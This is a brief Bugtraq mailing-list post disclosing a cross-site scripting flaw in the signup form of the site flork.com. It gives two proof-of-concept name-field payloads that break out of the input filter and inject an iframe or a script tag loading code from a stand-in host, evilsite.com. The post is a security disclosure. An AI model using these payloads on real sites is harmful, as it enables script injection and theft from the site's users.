Bugtraq mailing list archives
Flork.com
From: luny () youfucktard com
Date: 10 Jun 2006 20:49:42 -0000
Flork.com Effected files: input boxes when creating a new user XSS Vulnerabiliy: We notice by adding empty tags and endingand beginning brackets we can bypass the filter of the flork.com signup. For PoC try adding either one of the below codes in as your name: ">'>'><iframe src=http://evilsite.com/scriptlet.html <<"<'<' ">'>'><SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT><'<'
Current thread:
- Flork.com luny (Jun 12)